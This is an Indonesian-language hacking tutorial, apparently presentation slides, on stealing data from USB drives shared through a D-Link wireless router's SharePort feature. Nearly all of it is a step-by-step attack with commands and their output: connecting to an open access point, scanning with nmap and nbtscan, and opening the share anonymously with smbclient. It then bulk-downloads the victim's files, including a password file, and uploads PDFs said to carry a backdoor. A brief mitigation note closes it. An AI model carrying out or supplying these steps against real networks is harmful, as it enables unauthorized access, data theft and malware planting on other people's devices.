Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhartono

2
SkenarioPenyerangan
Keterangan :
Attackerakan melakukan penyerangan terhadap SharePortyang terdapat padaAccess
Pointmelaluiwireless.
Attackerakan masuk kedalam usb flashdiskmaupunharddiskuntuk melakukan
pencurian data dan kegiatan lainnya.
Attackerpun bisa melakukan penyerangan terhadap printer.
2
SkenarioPenyerangan
Keterangan :
Attackerakan melakukan penyerangan terhadap SharePortyang terdapat padaAccess
Pointmelaluiwireless.
Attackerakan masuk kedalam usb flashdiskmaupunharddiskuntuk melakukan
pencurian data dan kegiatan lainnya.
Attackerpun bisa melakukan penyerangan terhadap printer.
2
SkenarioPenyerangan
Keterangan :
Attackerakan melakukan penyerangan terhadap SharePortyang terdapat padaAccess
Pointmelaluiwireless.
Attackerakan masuk kedalam usb flashdiskmaupunharddiskuntuk melakukan
pencurian data dan kegiatan lainnya.
Attackerpun bisa melakukan penyerangan terhadap printer.

3
Melakukan Penyerangan
1.Lakukan koneksi keAccessPoint (AP)yang menjadi target.Cek koneksi keAP:
root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11abg ESSID:"lirva32_was_here"
Mode:Managed Frequency:2.457 GHz Access Point: C8:BE:19:8C:37:A4
Bit Rate=24Mb/s Tx-Power=15 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=70/70 Signal level= -24 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx in valid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
eth0 no wireless extensions.
2.Setelah koneksi berhasil, maka kita akan mendapatkan IPdariDHCP server. Sudah
menjadi kebiasaan jikaAPdidirikan selalu sajaDHCPjuga didirikan dengan tujuan
untuk mempermudah user melakukan koneksi ke wireless AP. Cek dapatIPberapa dari
DHCP Server:
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1d:72:19:45:4d
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16
lo Link encap:Lo cal Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:474 errors:0 dropped:0 overruns:0 frame:0
TX packets:474 errors:0 droppe d:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:145389 (145.3 KB) TX bytes:145389 (145.3 KB)
wlan0 Link encap:Ethernet HWaddr 00:1c:bf:00:5e:fb
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.2 55.0
inet6 addr: fe80::21c:bfff:fe00:5efb/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1464 errors:0 dropped:0 overruns:0 frame:0
TX packets:53 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:161210 (161.2 KB) TX bytes:7250 (7.2 KB)
Nah, devices wlan0 sudah mendapat IP dari DHCP, yaitu : 192.168.0.100 /24

4
3.Network Scannning,lakukan networkscanninguntuk mendapatkan target dengan baik
dan benar. Tadi kita sudah mendapatkan IP untuk wlan0 kan...?? yaitu : 192.168.0.100
/24, maka kita akan lakukan prosesnetwork scanning1 range IP yaitu : 192.168.0.1-
192.168.0.254.
root@bt:~# nmap -T4-F 192.168.0.0/24
Starting Nmap 6.25 ( http://nmap.org ) at 2013 -03-26 10:26 WIT
Nmap scan report for 192.168.0.1
Host is up (0.0081s latency).
Not shown: 95 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
139/tcp open netbios -ssn
445/tcp open microso ft-ds
49152/tcp open unknown
MAC Address: C8:BE:19:87:37:A4 (Unknown)
Nmap scan report for 192.168.0.100
Host is up (0.000021s latency).
Not shown: 99 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 256 IP addresses (2 ho sts up) scanned in 34.24 second
Hasil analisa :
Port 139/tcp open netbios-ssn.Portini merupakanport Netbios Session Service
yang biasanya digunakan untuk resource sharingpadawindows.Contohnya adalah:
FolderdanFile Sharing, Printer Sharing.
Port 445/tcp open microsoft-ds.Portini merupakanport Microsoft Directory Services
yang biasanya digunakan untuk windows file sharingdan menyediakan ba nyak
layanan lainnya.Port 445/ tcpjuga ada sangkutannya dengan SMB over IP(SMB is
known as "Samba").KeduaPorttersebut yaitu:139/tcpdan445/tcpmerupakan
portyang sejak dulu dikenal sangat rentan untuk diserang.
4.Mari kita lakukan proses scanningyang lebih mendalam terhadap IPyang sudah
ditargetkan untuk mendapatkan informasi yang lebih lengkap lagi.

5
root@bt:~# nmap-p 1-65535-T4-A-v 192.168.0.1
Starting Nmap 6.25 ( http://nmap.org ) at 2013 -03-26 10:57 WIT
NSE: Loaded 106 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 10:57
Scanning 192.168.0.1 [1 port]
Completed ARP Ping Scan at 10:57, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:57
Completed Parallel DNS resolution of 1 host. at 10:57, 13.00s elapsed
Initiating SYN Stealth Scan at 10:57
Scanning 192.168.0.1 [65535 ports]
Discovered open port 53/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 139/tcp on 192.168.0.1
Discovered open port 445/tcp on 192.168.0.1
Discovered open port 49152/tcp on 192.168.0.1
Completed SYN Stealth Scan at 10:58, 32.92s elapsed (65535 total ports)
Initiating Service scan at 10:58
Scanning 5 services on 192.168.0.1
Completed Service scan at 10:58, 11.22s elapsed (5 services on 1 host)
Initiating OS detection (t ry #1) against 192.168.0.1
NSE: Script scanning 192.168.0.1.
Initiating NSE at 10:58
Completed NSE at 10:58, 7.50s elapsed
Nmap scan report for 192.168.0.1
Host is up (0.0031s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
1/tcp filtered tcpmux
53/tcp open domain dnsmasq 2.45
| dns-nsid:
|_bind.version: dnsmasq -2.45
80/tcp open http?
|_http-favicon: Unknown favicon MD5: 107579220745D3B21461C23024D6C 4A3
|_http-methods: No Allow or Public header in OPTIONS response (status code 501)
|_http-title: D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME
139/tcp open netbios -ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netb ios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
49152/tcp open unknown
-
-
-
SF:99\x2017:22:07\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\
SF:x20\x20\x20127\r\n\r\n<title>501\x20Not\x20Implemented</title> \n<h1>501
SF:\x20Not\x20Implemented</h1>\nYour\x20request\x20was\x20not\x20understoo
SF:d\x20or\x20not\x20allowed\x20by\x20this\x20server\.\n");
MAC Address: C8:BE:19:87:37:A4 (Unknown)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 -2.6.36
Uptime guess: 0.054 days (since Tue Mar 26 09:41:33 2013)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros

6
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.24)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2000 -01-01T01:22:11+08:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| Share-level authentication (dangerous)
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 3.12 ms 192.168.0.1
NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.65 seconds
Raw packets sent: 65681 (2.891MB) | Rcvd: 65630 (2.626MB)
Hasil analisa :
* 53/tcp open domain dnsmasq 2.45
* http-title: D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME
* 139/tcp open netbios -ssn Samba smbd 3.X (workgroup: WORKGROUP)
* 445/tcp open netbios -ssn Samba smbd 3.X (workgroup: WORKGROUP)
* MAC Address: C8:BE:19:87:37:A4 (Unknown )
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
* Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.24)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2000 -01-01T01:22:11+08:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| Share-level authentication (dangerous)
| SMB Security: Challenge/response passwo rds supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
* Ternyata port 139/tcp dan 445/tcp mengaktifkan smbd 3.x dengan
nama workgroup : WORKGROUP

7
5.Llanjutkanpada proses berikutnya, yaitu mengidentifikasismbd 3.x:
root@bt:~# nbtscan 192.168.0.1
Doing NBT name scan for addresses from 192.168.0.1
IP address NetBIOS Name Server User MAC address
----------------------------- -------------------------------------------------
192.168.0.1 DWR -112 <server> DWR -112 00-00-00-00-00-00
root@bt:~# nbtscan -v-s : 192.168.0.1
192.168.0.1:DWR-112 �:00U
192.168.0.1:DWR-112 �:03U
192.168.0.1:DWR-112 �:20U
192.168.0.1:DWR-112 �:00U
192.168.0.1:DWR-112 �:03U
192.168.0.1:DWR-112 �:20U
192.168.0.1:WORKGROUP �:00G
192.168.0.1:WORKGROUP �:1eG
192.168.0.1:WORKGROUP � :00G
192.168.0.1:WORKGROUP �:1eG
192.168.0.1:MAC:00-00-00-00-00-00
Hasil analisa untuk smbd 3.x, yaitu :
IP : 192.168.0.1
NetBIOS Name : DWR-112
Server : <server>
User : DWR-112
6.Nah, sekarang saatnya kita lanj ut pada proses penyerangan kepada media
penyimpanannya :
root@bt:~# smbclient -L 192.168.0.1
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
Sharename Type Comment
--------- ---- -------
Drive_A5 Disk Device(A) (SanDisk,Firebird USB Flash Drive)
IPC$ IPC IPC Service (DWR -112)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
Server Comment
--------- -------
Workgroup Master
--------- -------
*ketika diminta password cukup tekan enter saja.
Hasil analisa :
Sharename : Drive_A5, IPC$

8
7.Kini saatnya memperdayai media penyimpanan target melalui smb console:
root@bt:~# smbclient //DWR -112/Drive_A5 ""
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
Server not using user level security and no password supplied.
smb:\> help
? allinfo altname archive blocksize
cancel case_sensitive cd chmod chown
close del dir du echo
exit get getfacl hardlink help
history iosize lcd link lock
lowercase ls l mask md
mget mkdir more mput newer
open posix posix_encrypt posix_open posix_mkdir
posix_rmdir posix_unlink print prom pt put
pwd q queue quit rd
recurse reget rename reput rm
rmdir showacls setmode stat symlink
tar tarmode translate unlock volume
vuid wdel logon listconnect showconnect
.. !
smb:\>
[01] Melihat status koneksi ke smb:
smb:\> showconnect
//DWR-112/Drive_A5
[02] Melihat isi usb flashdisktarget :
smb:\> l
. D 0 Thu Jan 1 07:00:00 1970
.. D 0 Fri Dec 31 23:00:26 1999
CCNA_Preparing D 0 Mon Nov 5 17:43:36 2012
CCNA_Preparing -Copy D 0 Mon Nov 5 17:43:36 2012
Copy please D 0 Wed Dec 5 13:51:24 2012
ebook_pilihan D 8857314 Sat Nov 10 10:56:02 2012
MODUL MIKROTIK D 0 Tue Aug 7 10:56:22 2012
ModulWiFiOkeh_cetak D 0 Mon Dec 3 16:14:22 2012
passwordspeedy.txt 47 1 Tue Nov 20 00:50:14 2012
PENTESTER CAREER.pptx 3057314 Sat Nov 10 10:56:02 2012
-*
-*
-*
hal.dll 134400 Tue Aug 3 20:59:14 2004
Modul DBA.docx 1027752 Wed Mar 13 15:29:54 2013
ModulWireless_okeh_bgt.pdf 4624212 Fri Jan 11 10:40:48 2013
60xx1 blocks of size 6xx36. 15141 blocks available

9
[03] Mengambil isi usb flasdisktarget :
root@bt:/# mkdir /home/hasil
root@bt:/# cd /home/hasil/
root@bt:/home/hasil# smbclient //DWR -112/Drive_A5 ""
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
Server not using user level security and no password supplied
smb:\> mget *.*
Get file 3030-3040.jpg? yes
getting file\3030-3040.jpg of size 99947 as 3030 -3040.jpg (1162.0
KiloBytes/sec) (average 1162.0 KiloBytes/sec)
-
-
Get file hal.dll? yes
getting file\hal.dll of size 134400 as hal.dll (1274.3 KiloBytes/sec)
(average 915.5 KiloBytes/ sec)
Get file Modul_Wireless.pdf? yes
getting file\Modul_Wireless.pdf of size 5512257 as Modul_Wire less.pdf
(2019.2 KiloBytes/sec)
(average 2064.6 KiloBytes/sec)
Get file Modul_wokShop2_cetak.doc? yes
getting file\Modul_wokShop2_cetak.doc of size 32209354 as
Modul_wokShop2_cetak.doc (1850.8 KiloBytes/sec)
(average 1917.6 KiloBytes/sec)
[05] Menanambackdoorke isiusb flasdisktarget :
Dowload filepdf dari usb target
smb:\ebook_pilihan\> mget*.pdf
Get file Modul_wokShop2.pdf? yes
getting file\jasakom_workshop2\Modul_wokShop2.pdf of size 5627760 as
Modul_wokShop2.pdf (2006.5 KiloBytes/sec)
(average 2006.5 KiloBytes/sec)
nah, sekarang file *.pdf sudah kita dapatkan, kini saatnya file *.pdf tersebut
Anda sisipkan backdoor. Maaf, saya tidak menulis bagaimana menyisipkan
backdoor kedalam *.pdf, silahkan dicari saja di google ;)

10
Setelah *.pdf Anda sisipkanbackdoor, sekarang tinggal kita masukan saja
*.pdf tersebut melalui smb console :
smb:\ebook_pilihan\> mput *.pdf
Put file Modul_wokShop2.pdf? yes
putting file Modul_wokShop2.pdf as \jasakom_workshop2\Modul_wokShop2.pdf
(1245.9 kb/s) (average 1245.9 kb/s)
-
-
-
Put file MICROSOFT SQL SERVER 7.p df? yes
putting file MICROSOFT SQL SERVER 7.pdf as \jasakom_workshop2\MICROSOFT
SQL SERVER 7.pdf (1124.3 kb/s)
(average 1209.3 kb/s)
Melakukan Pengamanan
Ada beberapa cara untuk mengurangi ketidak amanan, hanya mengurani saja
kok, yaitu :
1.Usahakan untuk tidak mempergunakan fasilitas shareport terhadap usb flashdisk yg kita
miliki
2.Amankan koneksi wireless AP dengan WPS, WPA2 dan MAC Filter agar wireless kita tidak
dipergunakan oleh pemakai yang tidak jelas.
Referensi
[1] http://www.samba.org/samba/d ocs/man/manpages-3/smbclient.1.html